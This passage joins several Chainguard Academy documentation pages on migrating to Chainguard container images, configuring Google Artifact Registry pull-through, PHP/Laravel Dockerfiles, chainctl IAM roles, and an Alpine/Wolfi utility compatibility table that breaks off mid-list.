recommended rollout strategy for most customers is as follows: Start with less complex and non-critical applications to build confidence before migrating mission-critical workloads. Employ a gradual approach where you choose a small subset of container images and deploy those first to a non-production environment for testing and validation, and then to a small percentage of production instances and then gradually scale up. Use strategies like blue-green deployments or canary releases to introduce the updated container images gradually into production. We understand that customers may have urgent timelines and need to accelerate Chainguard Container deployment by rolling out many images to a larger percentage of production simultaneously. For customers to be successful in this accelerated approach, we recommend the following: Have internal Chainguard Container champions identified and ready to lead and assist cross-functionally across teams. Your teams participating in the Chainguard Container migration should have the following technical skillset: Familiarity with tools used to build images and run containers such as Docker CLI, Dockerfiles (including multi-stage builds), and orchestration platforms (Kubernetes, ECS, etc). Experience using appropriate deployment security standards (such as the Kubernetes Pod Security Standards). Experience debugging containers that have no shell. Review and understand concepts in the Shared Responsibility Model.
Your organization should already have a mature container strategy in place, including: Mature and established UAT and regression testing processes. Automated CI/CD with permissions restrictions and auditing. Monitoring, logging and runtime security. Finally, as you plan for the migration to Chainguard Containers you should ensure there’s a clear rollback plan in case of unforeseen issues during migration. Keep the previous container image tagged and accessible for quick redeployment if necessary. Adding certificates A common requirement for many customers is to add a company-specific certificate or other security-related content. The three most common ways to accomplish this are: the incert tool; a Dockerfile with the update-ca-certificates utility; or a Dockerfile with the Java keytool utility. The process of adding or updating certificates, configuring APK repositories, and implementing other organization-specific customizations into an image is commonly known as creating a “Golden Image”. This approach enables these standard modifications to be applied once and then distributed across all teams, thereby reducing the risk of errors and minimizing friction during the migration process. Image Type Considerations Many Chainguard customers use both application and base container images, but it often takes more time to migrate your applications to a base image in comparison to an application image due to the complexity of coordinating multiple teams, testing, and release schedules. We recommend starting with and migrating to application images first while your teams get trained and onboarded with base images. Application Images When migrating to a Chainguard Application Container you should first check the image’s overview page on the Containers Directory for usage details and any compatibility notes. There may be user, permissions, or volume path differences with the Chainguard Image that you should be aware of. It is a best practice to use the same version of the Chainguard Application Image as what is currently running in your environment, if that version is available from Chainguard. Post-migration you should thoroughly test and monitor your application. Base Images When migrating to a Chainguard Base Container you should first check the image’s overview page on the Containers Directory for usage details and any compatibility remarks. You should understand the libraries, runtime requirements, and operating system dependencies of the applications you plan to have running on the base image. It is a best practice to use the same versions of any languages or applications that will be running on the Chainguard Base Container as what is currently running in your environment. Do not upgrade language or application versions at the same time that you migrate. Post-migration you should test and monitor your application as outlined below in Section 6. If you need a package to use with your Chainguard Base Container, Chainguard OS packages are available using apk. Ensure you only use Chainguard OS packages, as Alpine APKs are not compatible with Chainguard OS. Additionally, it is important to note that vendor-provided packages need to be glibc-based and their functionality should be fully tested along with the application. Extending Chainguard Containers You can take advantage of Chainguard’s Custom Assembly and Private APK Repositories features to extend your container images. Custom Assembly allows users to create custom container images with extra packages added.
This reduces their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. Private APK Repositories, meanwhile, allow customers to pull secure apk packages from Chainguard. The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to. Tips for Migrating to Chainguard Containers Although not fully comprehensive, the following list of tips and strategies can be helpful to keep in mind when migrating to Chainguard Containers. Use development variants when you need a shell If necessary, install a different shell Use apk search to find the utilities needed by your application Beware of entrypoint differences between Chainguard Containers and their upstream counterparts Be aware that Chainguard Containers typically do not run as root by default If packages you need are missing, install them into a base image, preferably as part of a multi-stage build Each of these tips and strategies is explained in greater detail in our guide on Container Migration Tips. Troubleshooting The move to a distroless workflow can be confusing for both individual developers and larger teams. We recommend taking the following steps when you encounter issues as you begin using Chainguard Containers: Debugging Distroless Container Images: Debugging distroless images can be challenging due to the absence of a shell and package manager. Temporary Rebuild with -dev Tag: Temporarily rebuild your image using the development variant to get a shell and other debugging tools. This is useful for local troubleshooting or in developer clusters. Remember to remove the -dev tag before merging. Ephemeral Debug Containers: In Kubernetes, use kubectl debug to launch an ephemeral container attached to the existing Pod for troubleshooting. Docker Debug: While docker debug is available, it requires a Docker Desktop Pro license. cdebug and kubectl debug: These tools allow you to enter a running container for debugging and can access the target container’s file system. chainctl images diff: This command allows you to compare two container images and identify differences between them. General Troubleshooting Tips: Check the image’s overview page in the Containers Directory for specific usage details. If you encounter issues, use a development image as a starting point. Ensure you’ve replaced apt install or equivalent commands with apk add. If elevated privileges are needed, use USER root before commands that require administrative access, then switch back to a non-root user before finalizing the image build. Always check the image documentation for entrypoint details, as they may vary from other distributions. You can find entrypoint details in the Specifications tab on any image’s entry in the Containers Directory. Troubleshooting resources To help with troubleshooting issues that can occur, Chainguard Academy has a guide on Debugging Distroless Containers. We also have a video on Debugging Distroless Containers with Docker Debug.
Lastly, you might also find help in the Chainguard Containers FAQs. Migration Resources Chainguard Academy hosts a number of resources that can be useful when migrating to Chainguard Containers. As mentioned previously, most new users of Chainguard Containers would benefit from following our guide on How to Port a Sample Application to Chainguard Containers. You may also find our Migration Best Practices and Checklist guide to be helpful. In addition to these, Chainguard Academy includes several types of resources that can be useful when migrating to Chainguard Containers: Compatibility Guides — These guides highlight the differences between Chainguard Containers and third-party images based on other distributions, such as Alpine. Migration Guides — These provide guidance on migrating workloads based on a specific language or platform to use Chainguard Containers. Getting Started Guides — These resources outline how to work with specific Containers, with some including a sample application used in examples. Chainguard Courses — Chainguard Courses exist to reduce onboarding friction through product-centered education. Language- or Platform-specific resources We currently offer both Migration and Getting Started Guides for these Containers: Image Migration Guide Getting Started Guide Node ✅ (link) ✅ (link) Python ✅ (link) ✅ (link) PHP ✅ (link) ✅ (link) Migration Guides Node PHP Python In addition, we have a few migration guides in the form of videos: Go (video) Java (video) Node (video) Compatibility Guides Alpine Debian Red Hat Ubuntu Getting Started Guides Cilium Go Istio Laravel MariaDB NeMo nginx Node PHP PostgreSQL Python PyTorch Ruby WordPress Courses In addition to the Academy resources listed above, Chainguard offers a number of courses aimed at helping teams understand and use Chainguard Containers. Quickstart Chainguard Containers Crash Course: A quick overview of everything you need to know to get started ASAP. Getting Started (Developer-focused) Getting Started With Chainguard Containers: Intro to everything you need to know - from basic setup to security scanning. Foundations of Supply Chain Security: The what, why, and how of keeping your software supply chain secure. Migration Guidance: Your friendly guide to moving to Chainguard Containers without the headaches. Level Up (Next Level Courses) Foundations of Supply Chain Security: The what, why, and how of keeping your software supply chain secure. Images! Images! Images!: Become an image expert - from FIPS to SBOMs and everything in between. Crush Your CVEs: Master vulnerability management and keep your systems secure. Running the Show (Admin Courses) Registry Rockstar: Everything you need to know about managing access, identity, and registry setup. Chainguard’s Superstar Support: Get the most out of Chainguard’s support resources and tools. Further Reading Overview of Chainguard Containers How to Use Chainguard Containers How to transition to secure container images with new migration guides (Blog) Getting Started with Distroless Containers --- ### How to Set Up Pull Through from Chainguard's Registry to Google Artifact Registry URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifact-registry-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers, Registry Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts.
In this situation, you can set up a proxy repository to function as a mirror of Chainguard’s registry. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up a remote repository with Google Artifact Registry. It will walk you through how to set up an Artifact Registry Repository you can use as a pull through cache for Chainguard’s public Starter containers or Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Docker installed on your local machine. Follow the official installation instructions to set this up. Administrative privileges over a Google Cloud Platform project. This project will also need to have the Artifact Registry API enabled. If you plan to set up an Artifact Registry repository to serve as a pull through cache for Production containers, then you will also need to have privileges to create a pull token from Chainguard. Additionally, you’ll need chainctl installed to create the pull token. If you haven’t already installed this, follow the installation guide. Setting up Google Artifact Registry as a Pull Through for Starter Containers Chainguard’s Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Google Artifact Registry from which you can pull Chainguard Starter container images, log in to the Google Cloud Console and choose your project. Once there, navigate to the Artifact Registry section, click on Repositories in the left-hand navigation menu, and click on the Create Repository button near the top of the page. On the Create Repository page, enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard-pull-through. Format — For the purposes of this guide, this must be set to Docker. Mode — Set this to Remote. Remote repository source — Choose Custom then enter https://cgr.dev/ in the Custom repository field. Following that, choose the Location, Encryption and Cleanup policy options for your repository. This guide’s examples will use the location us-central1, but you can choose the location that best suits your needs. Finally, click the Create button to create the repository. Testing pull through of a Starter container image By default, the Artifact Registry repository requires authentication. Configure Docker to authenticate to Google Artifact Registry with a valid Google Cloud account: gcloud auth configure-docker us-central1-docker.pkg.dev Be sure to change us-central1 to reflect the location of your Artifact Registry repository. Also, after running this command you may be prompted to log in to your Google Cloud account. After running the command, you will be able to pull a Starter container through Google Artifact Registry. The following example pulls the go container: docker pull us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/chainguard/go:latest This command first specifies the location of the Artifact Registry repository we just created (us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/). It then follows that with the name of the Starter container and the remote repository we want to pull it from (chainguard/go:latest).
If you run into issues with this command, be sure that it contains the correct Google Artifact Registry URL for your repository, including the location and project ID. Setting up Google Artifact Registry as a Pull Through for Production Containers Chainguard’s Production container images are enterprise-ready container images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up a Google Artifact Registry repository that you can use as a pull through cache for Chainguard Production container images is similar to the one outlined previously for Starter containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived tokens that can be used to pull container images from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Google Artifact Registry. First log in with chainctl: chainctl auth login Then configure a pull token: chainctl auth configure-docker --pull-token This command will prompt you to select an organization. Be sure to select the organization whose Production container images you want to pull through the Artifact Registry repository. This will create a pull token and print a docker login command that can be run in a CI environment to log in with the token. This command includes both --username and --password arguments. Note down the username value, as you will need it shortly. Then run the following command to create an environment variable named $PASSWORD set to the pull token password generated by the previous command: export PASSWORD=<password value copied from previous output> Now that you’ve set up a pull token, you can configure a repository for pulling through Production container images. You can edit the existing repository and all your users will have access to the private images. Alternatively, you could create a new chainguard-private repository exactly as before but with restricted access, though restricting access to repositories in Google Artifact Registry is beyond the scope of this guide. First, you will need to store the pull token password as a Google Secret Manager secret. This is because Google Artifact Registry does not support storing passwords directly in the repository configuration. To do this, first run the following command: gcloud secrets create chainguard-pull-token This command creates an empty secret. Next, you can update the secret with the pull token password using the environment variable you set previously: echo -n $PASSWORD | gcloud secrets versions add chainguard-pull-token --data-file=- If you haven’t already done so, this command will ask if you want to enable the Secret Manager API. Press y and then ENTER to enable the API and allow the command to finish. Alternatively, you can also provide the secret using the Google Cloud Console in the Secret Manager section. To do this, select Create Secret, provide a name for the secret, and enter the pull token password in the Secret value field. You also have the option to choose a replication policy, rotation policy, expiration policy, notification policy and more for the secret. Back in the Google Artifact Registry, click on the repository you want to configure for pulling through Production containers and then click on the Edit button to edit the repository configuration. 
In the Remote repository source section of the configuration screen, choose Authenticated. Enter the pull token username value in the Username field. In the Password field, select the secret you created in Google Secret Manager. Click the Save button to apply the changes. Testing pull through of a Production container: As with testing pull through of a Starter container, you’ll first need to authenticate to the Artifact Registry: gcloud auth configure-docker us-central1-docker.pkg.dev Be sure to change us-central1 to reflect the location of your Artifact Registry repository. After running the command, you will be able to pull any Production container images that your organization has access to through Google Artifact Registry. For example, the following command will pull the chainguard-base Container if your organization has access to it: docker pull us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Chainguard organization’s registry. Debugging Pull Through from Chainguard’s Registry to Google Artifact Registry If you run into issues when trying to pull Containers from Chainguard’s registry to Google Artifact Registry, please ensure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Google Artifact Registry repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the Google Artifact Registry pull token credentials) and try pulling an image from cgr.dev/chainguard/<image name> or cgr.dev/<company domain>/<image name>. It could be that your Google Artifact Registry repository was misconfigured. In this case, create and configure a new Google Artifact Registry repository to test with. Learn More If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Google Artifact Registry, we encourage you to refer to the official Google Artifact Registry documentation. --- ### Migrating to PHP Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-php/ Last Modified: April 4, 2024 Tags: Chainguard Containers, Product, Migration Chainguard Containers are built on top of Wolfi, a Linux undistro designed specifically for containers. Our PHP images have a minimal design that ensures a smaller attack surface, which results in smaller images with few to zero CVEs. Nightly builds deliver fresh images whenever updated packages are available, which also helps to reduce the toil of manually patching CVEs in PHP images. This article will assist you in the process of migrating your existing PHP Dockerfiles to leverage the benefits of Chainguard Containers, including a smaller attack surface and a more secure application footprint. PHP Chainguard Containers Chainguard offers multiple PHP images and variants catering to distinct use cases. In addition to the regular PHP image that includes CLI and FPM variants, we offer a dedicated Laravel image designed for Laravel applications. Each variant comes in two flavors: a minimal runtime image (distroless) and a development variant distinguished by the -dev suffix (e.g., latest-dev). 
In a nutshell, distroless images don’t include a package manager or a shell; they are used exclusively as runtimes to keep the environment to a minimum. Development variants, on the other hand, include packages such as apk and composer for building PHP applications. Development variants can be used as-is to provide a more straightforward migration path. Whenever possible, though, we encourage users to combine both images in a multi-stage environment to build a final distroless image that will function strictly as an application runtime. For a deeper exploration of distroless images and their differences from standard base images, refer to the guide on Getting Started with Distroless images. Migrating from non-apk systems When migrating from distributions that are not based on the apk ecosystem, you’ll need to update your Dockerfile accordingly. Our high-level guide on Migrating to Chainguard Containers contains details about distro-based migration and package compatibility when migrating from Debian, Ubuntu, and Red Hat UBI base images. Installing PHP Extensions Wolfi offers several PHP extensions as optional packages you can install with apk. Because PHP extensions are system-level packages, they require apk, which is only available in our development image variants. The following extensions are already included within all Chainguard PHP image variants: php-mbstring php-curl php-openssl php-iconv php-mysqlnd php-pdo php-pdo_sqlite php-pdo_mysql php-sodium php-phar In addition to those, the Laravel image includes the following extensions: php-ctype php-dom php-fileinfo php-simplexml You can run a temporary container with the php -m command to see a list of enabled extensions: docker run --rm --entrypoint php cgr.dev/chainguard/php -m To check for extensions available for installation, you can run a temporary container with the dev variant of a given image and use apk to search for packages. For instance, this will log you into a container based on the php:latest-dev image: docker run -it --rm --entrypoint /bin/sh --user root cgr.dev/chainguard/php:latest-dev Make sure to update the package manager cache: apk update If you want to search for PHP 8.2 XML extensions, for example, you can run the following: apk search php*8.2*xml* And this should give you a list of all PHP 8.2 XML extensions available in Wolfi. php-8.2-simplexml-8.2.17-r0 php-8.2-simplexml-config-8.2.17-r0 php-8.2-xml-8.2.17-r0 php-8.2-xml-config-8.2.17-r0 php-8.2-xmlreader-8.2.17-r0 php-8.2-xmlreader-config-8.2.17-r0 php-8.2-xmlwriter-8.2.17-r0 php-8.2-xmlwriter-config-8.2.17-r0 php-simplexml-8.2.11-r1 php-xml-8.2.11-r1 php-xmlreader-8.2.11-r1 php-xmlwriter-8.2.11-r1 For more searching tips, check the Searching for Packages section of our base migration guide. Migrating PHP CLI workloads to use Chainguard Containers Our latest and latest-dev PHP image variants are designed to run CLI applications and scripts that don’t need a web server. As a first step towards migration, you might want to change your base image to the latest-dev variant, since that would be the closest option for a drop-in base image replacement. Once you have your dependencies and steps dialed in, you can optionally migrate to a multi-stage build to create a strict runtime containing only what the application needs to run. The following Dockerfile uses the php:latest-dev image to build the application, which in this case means copying the application files and installing dependencies via composer.
A second build stage copies the application to a final distroless image based on php:latest.

```Dockerfile
FROM cgr.dev/chainguard/php:latest-dev AS builder

USER root
COPY . /app
RUN chown -R php /app

USER php
RUN cd /app && \
    composer install --no-progress --no-dev --prefer-dist

FROM cgr.dev/chainguard/php:latest
COPY --from=builder /app /app

ENTRYPOINT [ "php", "/app/myscript.php" ]
```

Our PHP Getting Started guide has step-by-step instructions on how to build and run a PHP CLI application with Chainguard Containers. Migrating PHP Web applications to use Chainguard Containers For PHP web applications that serve content through a web server, you should use the latest-fpm and latest-fpm-dev variants of our PHP image. Combine it with our Nginx image and an optional database for a traditional LEMP setup. The overall migration process is essentially the same as described in the previous section, with the difference that you won’t set up application entry points, since these images run as services. Your Dockerfile may require additional steps to set up front-end dependencies, initialize databases, and perform any additional tasks needed for the application to run through a web server. You can use Docker Compose to create a LEMP environment and test your setup locally. The following docker-compose.yaml file creates a local environment to serve a PHP web application using our PHP-FPM, Nginx, and MariaDB images:

```yaml
version: "3.7"

services:
  app:
    image: cgr.dev/chainguard/php:latest-fpm-dev
    restart: unless-stopped
    working_dir: /app
    volumes:
      - ./app:/app
    networks:
      - wolfi
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:8080
    volumes:
      - ./app:/app
      - ./nginx.conf:/etc/nginx/nginx.conf
    networks:
      - wolfi
  mariadb:
    image: cgr.dev/chainguard/mariadb
    restart: unless-stopped
    environment:
      MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1
      MARIADB_USER: user
      MARIADB_PASSWORD: password
      MARIADB_DATABASE: php-test
    ports:
      - 3306:3306
    networks:
      - wolfi

networks:
  wolfi:
    driver: bridge
```

Notice that the environment creates a few shared volumes to share the application files and also the nginx.conf file with the specific web server configuration. You’ll need that to tell Nginx to redirect .php requests to the php-fpm service. An example nginx.conf file to handle PHP requests with default settings:

```nginx
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    server {
        listen 8080;
        index index.php index.html;
        root /app/public;

        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_pass app:9000;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            fastcgi_param PATH_INFO $fastcgi_path_info;
        }

        location / {
            try_files $uri $uri/ /index.php?$query_string;
            gzip_static on;
        }
    }
}
```

Migrating Laravel Applications to use Chainguard Containers Chainguard has a dedicated Laravel image designed for applications built on top of the Laravel PHP Framework. This image is based on the php:latest-fpm variant, with additional extensions required by Laravel. Migration should follow the same steps described in previous sections, with the laravel:latest-dev variant as builder and laravel:latest as the distroless variant of this image. In addition to including extensions required by Laravel by default, the image includes a laravel system user that facilitates running composer and artisan commands from a host environment, which enables users to create and develop Laravel applications with the -dev variant of this image.
Check the section on Developing Laravel Applications for more information on how to use the development variant of the Laravel image for development environments. Using Development Containers Our PHP development images are minimal yet versatile images that include apk and composer. You can use these images to create and develop PHP applications on a containerized development environment. Development images can be identified by the -dev suffix (e.g: php:latest-dev). You can use them to execute Composer commands from a Dockerfile or directly from the command line with docker run. This allows users to run Composer without having to install PHP on their host system. Running Composer To be able to write to your host’s filesystem through a shared volume, you’ll need to use the root container user when installing dependencies with Composer using the latest-dev or latest-fpm-dev image variants. Example 1: Installing Dependencies docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ install Example 2: Requiring a new dependency docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ require minicli/minicli You’ll need to fix file permissions once installation is finished: sudo chown -R ${USER}:${USER} . Running the Built-in Web Server You can use the built-in PHP web server to preview web applications using a docker run command with a port redirect. The following command will run the php:latest-dev image variant with the built-in server (php -S) on port 8000, redirecting all requests to the same port on the host machine, and using the current folder as document root: docker run -p 8000:8000 --rm -it -v ${PWD}:/work \ cgr.dev/chainguard/php:latest-dev \ -S 0.0.0.0:8000 -t /work The preview should be live at localhost:8000. Developing Laravel Applications The laravel:latest-dev image has a system user with uid 1000 that can be used for development. This facilitates handling file permissions when working with shared volumes in a development environment. Creating a New Laravel Project The following command will create a new Laravel project called demo-laravel in the current folder. docker run --rm -v ${PWD}:/app --entrypoint composer --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ create-project laravel/laravel demo-laravel --working-dir=/app Running Artisan Commands To run Artisan commands, you’ll need to create a volume to share your Laravel application within the container and set the image entrypoint to /app/artisan. The following example runs the artisan migrate command from the application folder: docker run --rm -v ${PWD}:/app --entrypoint /app/artisan --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ migrate Running the Artisan Web Server To quickly preview your Laravel application, you can use Artisan’s built-in web server. The following command runs the built-in Artisan web server from the application folder: docker run -p 8000:8000 --rm -it -v ${PWD}:/app --entrypoint /app/artisan --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ serve --host=0.0.0.0 The preview should be live at localhost:8000. Additional Resources Our PHP image documentation covers details about all PHP image variants, including the list of available tags for both development and production images. For another example of a LEMP setup using MariaDB, check our guide on Getting Started with the MariaDB Chainguard Container. 
The Debugging Distroless guide contains important information for debugging issues with distroless images. You can also refer to the Verifying Containers resource for details around provenance, SBOMs, and image signatures. --- ### Overview of Roles and Role-bindings in Chainguard URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/roles-role-bindings/roles-role-bindings/ Last Modified: April 3, 2024 Tags: chainctl, Product, Overview In the context of Chainguard, an identity represents an individual user within an organization. Chainguard’s IAM model allows administrators to assign identities to specialized roles which define the level of access that an identity has to the organization’s resources. You assign a role by creating a role-binding, which is what ties an identity to a given role. This guide serves as an overview of what roles and role-bindings are within the context of Chainguard. It also outlines how you can manage roles and role-bindings with chainctl. Prerequisites This guide includes several examples of how you can manage roles and role-bindings with chainctl, the Chainguard command-line tool. To set up chainctl, follow our guide on how to install chainctl if you haven’t done so already. Roles There are a number of built-in roles in Chainguard’s IAM model that customers can assign to identities within their organization. owner is the role with the most privileges. An owner can create, delete, view (list), and modify (update) organizations, account associations, role-bindings, organization invitations, custom roles, role-bindings, and subscriptions. editor is the role with read access and limited creation and modification access. An editor can create, delete, and view images, clusters, role-bindings, and subscriptions. Additionally, an editor can modify role-bindings and subscriptions. As opposed to the owner role, an editor can view images, policies, records, organizations, organization invites, roles, and account associations but cannot create or make changes to these resources. viewer is a role that generally only has read-only access. That is, a viewer can list images, policies, organizations (and organization invites), clusters, records, roles and role-bindings, subscriptions, and account associations. The remaining roles are for more specialized functions. For example, registry.pull, registry.push, and registry.pull_token_creator relate to administering a registry of Chainguard products. You can run chainctl iam roles list to retrieve a list of all the roles available to your organization and review each of their specific capabilities. This command will list all the built-in roles as well as any custom roles created for your organization. The next section outlines how to create and manage such custom roles. Managing custom roles You can use chainctl to create custom roles for teams or individuals in your organization, like in the following example. chainctl iam roles create my-role After running this command, an interactive prompt will appear asking you to select what capabilities the new role should have and the organization under which the role should be created. You can avoid using the interactive prompt by including the --parent and --capabilities options in this command. chainctl iam roles create new-role --parent=example-org --capabilities=roles.list This example creates a new role named new-role under an organization named example-org. The new role will only have the ability to list roles in the organization. 
You can also use chainctl to delete custom roles. chainctl iam roles delete new-role Note that you cannot delete any of the built-in roles. Attempting to do so will result in an error. Managing Role-bindings You can assign a role — and all of its capabilities — to a given user by creating a role-binding and tying it to that user’s identity. You can run a command like the following example to create a role-binding. chainctl iam role-bindings create This will start an interactive prompt where you can enter the appropriate details for this new role-binding. Specifically, you’ll be prompted to specify the identity to bind, the role you want the identity bound to, and the organization that the role-binding should belong to. To avoid using the interactive prompt, you can add these details to the command by including the --identity, --role, and --parent options. chainctl iam role-bindings create --identity=example-id --role=viewer --parent=example-org This example creates a role-binding for the identity example-id with the built-in viewer role in an organization named example-org. Note that in order to use the --identity option like this, you will need to know the given identity’s UIDP. You can find a list of all your identities’ UIDPs by running chainctl iam identities ls. The identities’ UIDPs will appear in the resulting ID column. Learn more You can create a Chainguard identity for an automation system (such as Buildkite or GitHub Actions) to assume. This process involves choosing a role for the assumable identity and then creating a role-binding for it. Check out our overview of assumable identities — as well as our collection of assumable identity examples — to learn more. If you’d like to learn more about Chainguard’s IAM model and structures, we encourage you to read our Overview of the Chainguard IAM Model. --- ### Alpine Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/alpine-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Alpine base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Alpine distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example, the zcat utility is included in the gzip package in both Wolfi and Alpine. Additionally, be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alpine binaries into a Wolfi-based container image. You can use the apk search command in Wolfi and Alpine to find out which package includes a tool.
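For example, a quick way to locate a missing utility is to search the package index from inside a -dev or wolfi-base container, since those are the variants that include apk. A minimal sketch (the package names searched for are illustrative):

```sh
# Refresh the package index first
apk update

# Search for packages by name; glob patterns are supported
apk search gzip
apk search 'php*xml*'
```

Once you have identified the package you need, apk add <package> installs it, either interactively or as a RUN step in a Dockerfile build stage.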
Utility Wolfi busybox Alpine busybox Wolfi coreutils Alpine coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ ✅ addgroup ✅ ✅ adduser ✅ ✅ adjtimex ✅ ✅ arch ✅ ✅ arp ✅ arping ✅ ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ ✅ bc ✅ ✅ beep ✅ ✅ blkdiscard ✅ blkid ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ ✅ coreutils ✅ ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ crond ✅ crontab ✅ cryptpw ✅ ✅ csplit ✅ ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ ✅ deluser ✅ ✅ depmod ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ eject ✅ env ✅ ✅ ✅ ether-wake ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fbset ✅ fbsplash ✅ fdflush ✅ fdisk ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ ✅ flock ✅ ✅ fmt ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ fsck ✅ fstrim ✅ fsync ✅ ✅ fuser ✅ ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ hwclock ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifenslave ✅ ifup ✅ init ✅ inotifyd ✅ ✅ insmod ✅ install ✅ ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ✅ ip ✅ ipaddr ✅ ipcalc ✅ ipcrm ✅ ✅ ipcs ✅ ✅ iplink ✅ ipneigh ✅ iproute ✅ iprule ✅ iptunnel ✅ join ✅ ✅ kbd_mode ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ ✅ lsmod ✅ lsof ✅ ✅ lsusb ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ ✅ makemime ✅ md5sum ✅ ✅ ✅ ✅ mdev ✅ mesg ✅ microcom ✅ ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mkfifo ✅ ✅ ✅ ✅ mkfs.vfat ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ ✅ mpstat ✅ ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nanddump ✅ nandwrite ✅ nbd-client ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ ✅ nohup ✅ ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ ntpd ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ ✅ paste ✅ ✅ 